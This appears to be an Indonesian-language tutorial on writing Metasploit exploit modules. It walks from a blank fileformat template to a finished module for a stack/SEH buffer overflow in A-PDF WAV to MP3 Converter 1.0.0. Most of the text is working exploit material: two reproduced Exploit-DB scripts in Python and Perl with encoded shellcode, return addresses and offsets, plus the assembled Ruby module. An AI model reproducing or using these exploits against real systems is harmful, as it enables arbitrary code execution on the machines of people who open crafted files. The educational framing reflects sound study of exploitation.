Sebelum melanjutkan belajar menulis exploit sendiri. Kita pelajari struktur2 coding exploit !!!

##
# $Id: $

##


##
# This file is part of the Metasploit Framework and may be subject to

# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.

# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

    Rank = GoodRanking


    include Msf::Exploit::FILEFORMAT
    include Msf::Exploit::Remote::Seh

    def initialize(info = {})

        super(update_info(info,
            'Name'           => 'Exploit Title',

            'Description'    => %q{
                    Exploit Description

            },
            'License'        => MSF_LICENSE,

            'Author'         =>
                [

                    'Author'
                ],

            'Version'        => '$Revision: $',
            'References'     =>

                [
                    [ 'URL', 'http://www.somesite.com/ ],

                ],
            'Payload'        =>

                {
                    'Space'    => 6000,

                    'BadChars' => "\x00\x0a",
                    'StackAdjustment' => -3500,

                },
            'Platform' => 'win',

            'Targets'        =>
                [

                    [ 'Windows Universal', { 'Ret' =>  } ],
                ],

            'Privileged'     => false,
            'DisclosureDate' => 'Date',

            'DefaultTarget'  => 0))


            register_options(
                [

                    OptString.new('FILENAME', [ true, 'The file name.',  'filename.ext']),
                ], self.class)

    end

    def exploit


        print_status("Creating '#{datastore['FILENAME']}' file ...")

        file_create(sploit)

    end

end


Jadi dalam menulis exploit sebenarnya mengacu pada acuan baku seperti diatas :

1. class Metasploit3 < Msf::Exploit::Remote
2. def initialize
3. def exploit
...
perhatikan ketiganya itu....
jadi apabila kita akan menulis exploit harus menggunakan ketiga metode ini,

perhatikan baik baik dan hafalkan.
Nanti saya akan mencontohkan bagaimana cara merubah structur tersebut menjadi sebuah exploit.

saya akan jelaskan satu persatu :
yang pertama coba perhatikan cara penulisan class diatas :

class Metasploit3 < Msf::Exploit::Remote

...

Rank = GoodRanking




include Msf::Exploit::FILEFORMAT



include Msf::Exploit::Remote::Seh

Itu adalah kata kata baku ......
lihat Seh ini adalah kata untuk kalimat remote.....
jadi apabila kita akan membuat exploit untuk meremote jarak jauh ingat selalu copy paste kata kata itu,

Tinggal mengganti tulisan2 note berikut ini :

def initialize(info = {})


...
super(update_info(info,



'Name' => 'Exploit Title',



'Description' => %q{



Exploit Description



},



'License' => MSF_LICENSE,



'Author' =>



[



'Author'



],



'Version' => '$Revision: $',



'References' =>



[



[ 'URL', 'http://www.somesite.com/ ],



],



'Payload' =>



{



'Space' => 6000,



'BadChars' => "\x00\x0a",



'StackAdjustment' => -3500,



},



'Platform' => 'win',



'Targets' =>



[



[ 'Windows Universal', { 'Ret' => } ],



],



'Privileged' => false,



'DisclosureDate' => 'Date',



'DefaultTarget' => 0))




register_options(



[



OptString.new('FILENAME', [ true, 'The file name.', 'filename.ext']),



], self.class)




end

 

 

kemudian bikin exploit dengan format sebagai berikut :



def exploit


...
print_status("Creating '#{datastore['FILENAME']}' file ...")



file_create(sploit)



end  


kita coba buat dengan menggunakan exploit disini :

http://www.exploit-db.com/exploits/14681/

kita cuba buat exploit ini menjadi metasploit framework.

‎#!/usr/bin/env python

#################################################################################
#
# Title: A-PDF WAV to MP3 v1.0.0 Universal Local SEH Exploit
...# Exloit By: Dr_IDE
# Tested On: XPSP3
# Date: August 18, 2010
# Download: http://www.brothersoft.com/a-pdf-wav-to-mp3-converter-394393.html
# Reference: http://www.exploit-db.com/exploits/14676/
# Usage: Import File, Select It, Click Play, Calc.
#
# EDB Notes:
# This exploit uses SEH to gain code execution, while EDB 14676 uses a direct
# EIP overwrite which is operating system specific.
#
#################################################################################

# windows/exec - 303 bytes CMD=calc.exe Encoder - alpha/upper EXITFUNC - SEH

code = (
"\x89\xe1\xd9\xee\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49"
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56"
"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41"
"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42"
"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a"
"\x48\x47\x34\x43\x30\x45\x50\x45\x50\x4c\x4b\x51\x55\x47"
"\x4c\x4c\x4b\x43\x4c\x45\x55\x42\x58\x45\x51\x4a\x4f\x4c"
"\x4b\x50\x4f\x45\x48\x4c\x4b\x51\x4f\x51\x30\x43\x31\x4a"
"\x4b\x51\x59\x4c\x4b\x50\x34\x4c\x4b\x43\x31\x4a\x4e\x46"
"\x51\x49\x50\x4c\x59\x4e\x4c\x4d\x54\x49\x50\x42\x54\x45"
"\x57\x49\x51\x49\x5a\x44\x4d\x43\x31\x48\x42\x4a\x4b\x4c"
"\x34\x47\x4b\x50\x54\x47\x54\x45\x54\x43\x45\x4b\x55\x4c"
"\x4b\x51\x4f\x47\x54\x45\x51\x4a\x4b\x45\x36\x4c\x4b\x44"
"\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x4c"
"\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x4c\x49\x51\x4c\x46"
"\x44\x44\x44\x48\x43\x51\x4f\x50\x31\x4a\x56\x45\x30\x50"
"\x56\x42\x44\x4c\x4b\x51\x56\x50\x30\x4c\x4b\x51\x50\x44"
"\x4c\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x43\x58\x45"
"\x58\x4b\x39\x4a\x58\x4d\x53\x49\x50\x42\x4a\x50\x50\x43"
"\x58\x4a\x50\x4d\x5a\x44\x44\x51\x4f\x45\x38\x4a\x38\x4b"
"\x4e\x4c\x4a\x44\x4e\x50\x57\x4b\x4f\x4d\x37\x42\x43\x43"
"\x51\x42\x4c\x42\x43\x43\x30\x41\x41");

buff = ("\x41" * 4132);
nops = ("\x90" * 12);
nseh = ("\xEB\x06\x90\x90");
retn = ("\x5C\x26\x47\x00");
junk = ("\x42" * 300);
sploit = (buff+ nseh + retn + nops + code + junk);

try:



f1 = open("Dr_IDEs.wav","w"); #No file checking, any file extension works... (.xyz .foo .abc)



f1.write(sploit);



f1.close();



print ('[*] Success. Load File.');

except:



print ("[-] Error, could not write the file.");

 

kita akan coba membuat sebuah exploit dari bug diatas,,,,,

namanya juga latihan........

jadi kita punya 2 aturan :
...1. Structure Metasploit yang paling atas yang bisa kita rubah2
2. Bug Remote Exploit.

Nanti kita coba buat sebuah exploit untuk bug diatas,


sekarang kita buka bug aslinya yang ada di web ini :

http://www.exploit-db.com/exploits/14676/

jadi ada 2 bug di aplikasi itu.....
kita mengacu ke bug2 milik http://www.exploit-db.com/


# Exploit Title: A-PDF WAV to MP3 Converter 1.0.0 (.m3u) Stack Buffer Overflow
# Author: d4rk-h4ck3r
# Date: 2010-07-17
# Software Link: http://www.brothersoft.com/a-pdf-wav-to-mp3-converter-394393.html
# Greetz 2 : PASSEWORD , KAiSER-J , sec4...ever , tli7a , All Tun!Sian h4ck3rz
# Spacial thanks 2 : MadjiX ( el m3alem )
# Tested on: Windows XP SP3 Fr

my $jnk="\x41" x 4128 ;
my $eip = "\x63\x46\x92\x7C" ; # 0x7C924663 call esp kernel 32
my $nop = "\x90" x 20;
$shellcode = $shellcode
."\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" .
"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" .
"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" .
"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" .
"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" .
"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" .
"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" .
"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" .
"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" .
"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" .
"\x7f\xe8\x7b\xca";

open(MYFILE,'>>d4rk.m3u');

print MYFILE $jnk.$eip.$nop.$shellcode;

close(MYFILE);

Ingat ...............

Dari Uraian diatas kita sudah punya 2 kunci :
1. Carilah Bugnya dan kita mendapatkan acuan bug di :

...

http://www.exploit-db.com/exploits/14676/



http://www.exploit-db.com/exploits/14681/
2. Kita sudah punya struktur cara menulis diatas,

Hanya itu dalam menulis exploit,
yuk kita praktekkan.................

 

 

 

Kita edit struktur acuan kita :

1. def initialize(info = {})
2. super(update_info(info,
3. 'Name' => 'A-PDF WAV to MP3 v1.0.0 Buffer Overflow',
...4. 'Description' => %q{



Kita dapat mengetikkan keterangan jenis exploit disini



},
5. 'License' => MSF_LICENSE,
6. 'Author' =>



[



'd4rk-h4ck3r', # Nama Penemu Exploit ini pertama



'Dr_IDE', # SEH Exploit (yang menggunakan SEH)



'dookie' # MSF Module



],
7. 'Version' => '$Revision: $',
8. 'References' =>



[



[ 'URL', 'http://www.exploit-db.com/exploits/14676/' ],



[ 'URL', 'http://www.exploit-db.com/exploits/14681/' ],



],

Sampai disini mudah bukan membuat header exploit....
Tinggal memindahkan Name, Description, License, Author, Version, dan Referece.... semua tinggal kita contek dari bug.......

 

 

kita lanjutkan dengan mengisi structure diatas dengan payloadnya :

 

‎'DefaultOptions' =>



{
...


'EXITFUNC' => 'seh',



'DisablePayloadHandler' => 'true'



},



'Payload' =>



{



'Space' => 600,



'BadChars' => "\x00\x0a",



'StackAdjustment' => -3500



},



'Platform' => 'win',



'Targets' =>



[



[ 'Windows Universal', { 'Ret' => 0x0047265c, 'Offset' => 4132 } ], # p/p/r in wavtomp3.exe



],



'Privileged' => false,



'DisclosureDate' => 'Aug 17 2010',



'DefaultTarget' => 0))

 


kemudian kita deklarasikan

register_options(



[
...


OptString.new('FILENAME', [ false, 'The file name.', 'msf.wav']),



], self.class)

 

 

kemudian kita buat exploitnya dengan mengacu 2 bug diatas



def exploit




...sploit = rand_text_alpha_upper(target['Offset'])



sploit << generate_seh_record(target.ret)



sploit << make_nops(12)



sploit << payload.encoded




print_status("Creating '#{datastore['FILENAME']}' file ...")




file_create(sploit)




end

finished....